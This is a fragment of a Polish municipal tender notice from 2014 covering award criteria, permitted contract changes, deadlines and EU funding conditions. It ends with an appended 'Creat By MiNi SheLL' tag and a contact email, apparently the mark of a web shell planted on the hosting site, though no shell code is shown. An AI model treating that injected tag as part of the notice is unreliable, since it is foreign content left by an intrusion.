<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przewiduje możliwość wprowadzenia zmian postanowień umowy dotyczących:
1)  	Zmiany wysokości wynagrodzenia Wykonawcy na skutek zmiany obowiązującej stawki podatku VAT.
2) 	Zmiany przedstawiciela Zamawiającego, zmiany osoby odpowiedzialnej za realizację przedmiotu zamówienia -po stronie Wykonawcy.
3)  	Zmiany z danych osobowych oraz rachunku bankowego.
4) 	Zmiany ilości (zmniejszenie lub zwiększenie) odpadów objętych umową, które zostały podane orientacyjnie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wielopole.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Wielopole Skrzyńskie
39 - 110 Wielopole Skrzyńskie 200 pok nr 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.05.2014 godzina 10:00, miejsce: Gmina Wielopole Skrzyńskie
39 - 110 Wielopole Skrzyńskie 200 pok nr 22.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com